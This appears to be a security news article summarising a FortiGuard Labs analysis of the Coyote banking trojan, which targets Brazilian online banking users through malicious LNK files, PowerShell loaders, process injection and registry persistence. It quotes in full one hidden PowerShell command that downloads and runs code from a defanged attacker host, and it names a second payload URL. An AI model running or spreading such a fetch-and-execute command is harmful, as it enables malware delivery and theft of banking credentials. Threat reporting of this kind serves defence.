Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil

Cybersecurity researchers at FortiGuard Labs have uncovered a stealthy and highly sophisticated banking trojan dubbed Coyote, which is actively targeting financial institutions and online banking users in Brazil.

This multi-stage attack leverages malicious LNK files and PowerShell scripts to infiltrate systems, deploy payloads, and steal sensitive banking credentials. Once installed, Coyote can keylog user activity, capture screenshots, display phishing overlays, and even manipulate browser windows to steal financial data.

The Coyote Banking Trojan is designed to harvest credentials from more than 70 financial applications and numerous online banking websites, making it one of the most sophisticated financial malware campaigns of 2024.

The attack begins with a weaponized LNK file that executes a hidden PowerShell command, connecting to a remote server and downloading additional payloads.

One of the observed commands used in this campaign:

-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."

This script fetches and executes additional malicious scripts, initiating the next stage of the attack.

“The LNK file executes the following PowerShell command, which connects to a remote server to initiate the next stage.”

The LNK file is customized with a unique ‘Machine ID’, allowing attackers to track infections and correlate them with other compromised systems.

The malware collects:

✅ Machine ID & MAC Address
✅ Windows version & installed security software
✅ Running processes & active network connections

These details are sent to remote C2 servers, allowing attackers to assess which victims are worth further exploitation.

Once the victim’s system is identified as a worthy target, Coyote proceeds to download and execute additional payloads:

1️⃣ MSIL Loader (bmwiMcDec.dll)

• Injects the npuGDec payload using VirtualAllocEx and WriteProcessMemory.
• Executes the payload using CreateRemoteThread for stealth execution.

2️⃣ Shellcode Loader

• Uses the Donut framework to decrypt and execute the final MSIL payload.

3️⃣ Persistence Mechanism

• Modifies the Windows registry at: HCKU\Software\Microsoft\Windows\CurrentVersion\Run
• Injects a PowerShell script that downloads the final Coyote Banking Trojan payload from: hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

Once the Coyote Banking Trojan is deployed, it can perform various malicious activities, including:

• Keylogging: Recording keystrokes to capture sensitive information like usernames, passwords, and credit card details.
• Capturing screenshots: Taking screenshots of the victim’s screen to gather additional information.
• Displaying phishing overlays: Displaying fake login forms or other overlays to trick users into entering their credentials.

“This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files,” the FortiGuard Labs analysis states. The Coyote Banking Trojan poses a significant threat to users in Brazil, as it targets a wide range of financial institutions and websites.

Related Posts:

• “Coyote” Trojan Strikes Brazil’s Banks, Experts Warn of Next-Gen Threat
• Update Beware! “Coyote” Trojan Uses Disguise to Infiltrate Brazilian Banks
• LNK Files and SSH Commands: The New Arsenal of Advanced Cyber Attacks
• Turla APT Group Unleashes Sophisticated Fileless Backdoor via Compromised Site